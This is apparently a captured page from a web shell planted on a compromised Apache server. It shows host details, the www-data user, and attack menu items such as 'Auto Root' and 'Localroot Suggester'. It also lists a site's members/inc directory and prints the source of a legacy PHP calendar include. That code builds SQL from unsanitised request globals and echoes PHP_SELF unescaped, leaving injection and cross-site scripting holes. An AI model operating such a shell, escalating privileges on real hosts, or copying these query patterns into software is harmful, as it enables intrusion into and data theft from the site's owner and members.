Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
cesa.co.za /
members /
inc /
Delete
Unzip
Name
Size
Permission
Date
Action
adobe.inc
107
B
-rw-r--r--
2008-01-09 07:51
auth.inc
3.52
KB
-rw-r--r--
2025-04-30 14:24
auth.inc.bak
1.12
KB
-rw-r--r--
2025-03-07 12:21
calendar.inc
5.46
KB
-rw-r--r--
2008-01-09 08:36
conf.inc
683
B
-rw-r--r--
2025-03-07 12:21
conf.inc.bak
690
B
-rw-r--r--
2025-03-07 12:21
confdec.inc
364
B
-rw-r--r--
2025-03-07 12:21
createadec.inc
175
B
-rw-r--r--
2008-01-09 07:51
db.inc
146
B
-rw-r--r--
2025-03-07 12:21
declaration.inc
19.69
KB
-rw-r--r--
2026-01-20 15:55
declaration_nav.php
4.76
KB
-rw-r--r--
2025-02-20 10:14
declaration_nav.php4
4.69
KB
-rw-r--r--
2008-01-09 08:36
declaration_nav_int.php
5.87
KB
-rw-r--r--
2021-02-24 09:22
declaration_nav_int.php4
5.96
KB
-rw-r--r--
2015-01-22 06:13
default.css
4.06
KB
-rw-r--r--
2008-01-09 07:51
dont-click.prefs.inc
3.38
KB
-rw-r--r--
2008-01-09 08:36
footer.inc
3.13
KB
-rw-r--r--
2025-05-19 11:13
footer2.inc
157
B
-rw-r--r--
2008-01-09 07:51
func.inc
3.36
KB
-rw-r--r--
2025-01-13 14:32
funcinternational.inc
2.66
KB
-rw-r--r--
2008-01-09 07:51
header.inc
4.12
KB
-rw-r--r--
2025-01-31 07:03
header2.inc
2.05
KB
-rw-r--r--
2008-01-09 08:36
internationalheader.inc
590
B
-rw-r--r--
2008-01-09 07:51
internationalmenu.inc
378
B
-rw-r--r--
2008-01-09 07:51
login_footer.inc
748
B
-rw-r--r--
2008-01-09 07:51
login_header.inc
1.43
KB
-rw-r--r--
2008-01-09 07:51
misc.inc
363
B
-rw-r--r--
2008-01-09 07:51
nav.inc
528
B
-rw-r--r--
2008-01-09 07:51
notice.inc
530
B
-rw-r--r--
2008-01-09 08:36
press.inc
1.53
KB
-rw-r--r--
2008-01-09 08:36
rc4cryptclass.inc
1.27
KB
-rw-r--r--
2008-01-09 07:51
readnext.inc
8.77
KB
-rw-r--r--
2025-03-07 12:21
readnext.inc.bak
6.8
KB
-rw-r--r--
2025-03-07 12:21
readnextold.inc
6.64
KB
-rw-r--r--
2025-03-07 12:21
sched1page2gen.inc
7.65
KB
-rw-r--r--
2025-07-18 08:31
submitcheck.inc
23.74
KB
-rw-r--r--
2025-07-18 09:41
submitcheck.inc.bak
6.28
KB
-rw-r--r--
2025-03-07 12:21
submitcheck2.inc
13.04
KB
-rw-r--r--
2025-07-18 07:32
submitcheck2_A.inc
18.75
KB
-rw-r--r--
2025-07-18 07:47
submitcheck2b.inc
11
KB
-rw-r--r--
2025-07-18 07:47
submitcheck2b_A.inc
14.9
KB
-rw-r--r--
2025-03-07 12:21
submitcheckA.inc
21.38
KB
-rw-r--r--
2025-07-18 07:20
submitcheckqmig.inc
1.35
KB
-rw-r--r--
2025-03-07 12:21
survey_footer.inc
2.35
KB
-rw-r--r--
2008-01-09 07:51
test.html
11.56
KB
-rw-r--r--
2008-01-09 07:51
viewcal.inc
2.33
KB
-rw-r--r--
2008-01-09 08:36
voting_class.inc
11.04
KB
-rw-r--r--
2025-03-07 12:21
work.inc
1.26
KB
-rw-r--r--
2008-01-09 08:36
Save
Rename
<? // list of names for days and months $days = array("Sunday", "Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday"); $months = array("", "January", "February", "March", "April", "May", "June", "July", "August", "September", "October", "November", "December"); // number of days in each month $totalDays = array(0, 31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31); // set up some variables to identify the month, date and year to display if(!$currYear) { $currYear = gmdate ("Y", time()+7200); } if(!$currMonth) { $currMonth = gmdate ("n", time()+7200); } if(!$currDay) { $currDay = gmdate ("j", time()+7200); } // if leap year, modify $totaldays array appropriately if (date("L", mktime(0,0,0,$currMonth,1,$currYear))) { $totalDays[2] = 29; } // set up variables to display previous and next months correctly // defaults for previous month $prevMonth = $currMonth-1; $prevYear = $currYear; // if January, decrement year and set month to December if ($prevMonth < 1) { $prevMonth=12; $prevYear--; } // defaults for next month $nextMonth = $currMonth+1; $nextYear = $currYear; // if December, increment year and set month to January if ($nextMonth > 12) { $nextMonth=1; $nextYear++; } // get down to displaying the calendar // find out which day the first of the month falls on $firstDayOfMonth = date("w", mktime(0,0,0,$currMonth,1,$currYear)); $detect = strrpos($PHP_SELF,"/"); if ($detect > 1) { $inc= "../inc/conf.inc"; } else { $inc = "inc/conf.inc"; } include($inc); // open a connection to the database $connection = mysql_connect($server, $user, $pass); // formulate the SQL query - same as above $query = "SELECT DISTINCT date from calendar where (userid='$loginid' OR userid='saace_evt') AND date >= '" . $currYear . "-" . sprintf("%02d", $currMonth) . "-01' and date <= '" . $currYear . "-" . sprintf("%02d", $currMonth) . "-" . $totalDays[$currMonth] . "'"; // run the query on the database $result = mysql_db_query($db,$query ,$connection); $x=0; $dateList=array(); if(mysql_num_rows($result) > 0) { while($row = mysql_fetch_array($result)) { $dates = explode("-", $row["date"]); $dateList[$x] = $dates[2]; $x++; } } // close connection mysql_close($connection); ?> <!-- month display --> <table border="0" cellpadding="1" cellspacing="1"> <tr> <td class="calendartexthead"><a class="calendartexthead" href="<? echo $PHP_SELF; ?>?currMonth=<? echo $prevMonth; ?>&currYear=<? echo $prevYear; ?>&currDay=<? echo $currDay; ?>"><<</a></td> <td class="calendartexthead" colspan="5" align="CENTER"><? echo $months[$currMonth] . " " . $currYear; ?></td> <td class="calendartexthead"><a class="calendartexthead" href="<? echo $PHP_SELF; ?>?currMonth=<? echo $nextMonth; ?>&currYear=<? echo $nextYear; ?>&currDay=<? echo $currDay; ?>">>></a></td> </tr> <!-- day names --> <tr> <? for ($x=0; $x<7; $x++) { echo "<td class=\"calendartextplain\">" . substr($days[$x],0,3) . "</td>"; } ?> </tr> <!-- start displaying dates --> <tr> <? // display blank spaces until the first day of the month for ($x=1; $x<=$firstDayOfMonth; $x++) { // this comes in handy to find the end of each 7-day block $rowCount++; echo "<td class=\"calendartext\"></td>\n"; } // counter to track the current date $dayCount=1; while ($dayCount <= $totalDays[$currMonth]) { // use this to find out when the 7-day block is complete and display a new row if ($rowCount % 7 == 0) { echo "</tr>\n<tr>\n"; } // if today, display in different colour // print date if ($dayCount == date("j") && $currYear == date("Y") && $currMonth == date("n")) { echo "<td class=\"calendartext\" align=center bgcolor=#FFFFCC width=\"21\"><a href=/calendar.php4?currYear=" . $currYear . "&currMonth=" . $currMonth . "&currDay=" . $dayCount . ">" . $dayCount. "</a>"; } else { echo "<td class=\"calendartext\" align=center bgcolor=#EEEEEE width=\"21\"><a href=/calendar.php4?currYear=" . $currYear . "&currMonth=" . $currMonth . "&currDay=" . $dayCount . ">" . $dayCount . "</a>"; } for ($y=0; $y<sizeof($dateList); $y++) { //echo $dateList[$y]; if ($dateList[$y] == $dayCount) { echo "+"; } } echo "</td>\n"; // increment counters $dayCount++; $rowCount++; } ?> </tr> <tr> <td class="calendartextplain" align=right colspan=7> <!--<a href="<? echo $HTTP_ENV_VARS["REDIRECT_URL"]."?currYear=" . $currYear . "&currMonth=" . $currMonth . "&currDay=" . $currDay ?>">this month</a>--> </td> </tr> <form method="get" action="<?php echo $PHP_SELF; ?>"> <tr><td colspan="3" class="calendartextplain" align="right"> <select name="currMonth" class="calendartextplain"> <?php for ($i=1; $i <= 12; $i++) { if ($i == $currMonth) { echo "<option value=\"$i\" selected>".$months[$i]; } else { echo "<option value=\"$i\">".$months[$i]; } } ?> </select> </td><td colspan="3" class="calendartextplain" align="right"> <select name="currYear" class="calendartextplain"> <?php $yearb4 = $currYear-2; $lastyear = $currYear-1; $nextyear = $currYear+1; $yearafter = $currYear+2; echo "<option value=\"$yearb4\">$yearb4"; echo "<option value=\"$lastyear\">$lastyear"; echo "<option value=\"$currYear\" selected>$currYear"; echo "<option value=\"$nextyear\">$nextyear"; echo "<option value=\"$yearafter\">$yearafter"; ?> </select> </td><td class="calendartextplain" align="right"> <input type="submit" value="go" class="calendartextplain"></td></tr> </form> </td></tr> </table>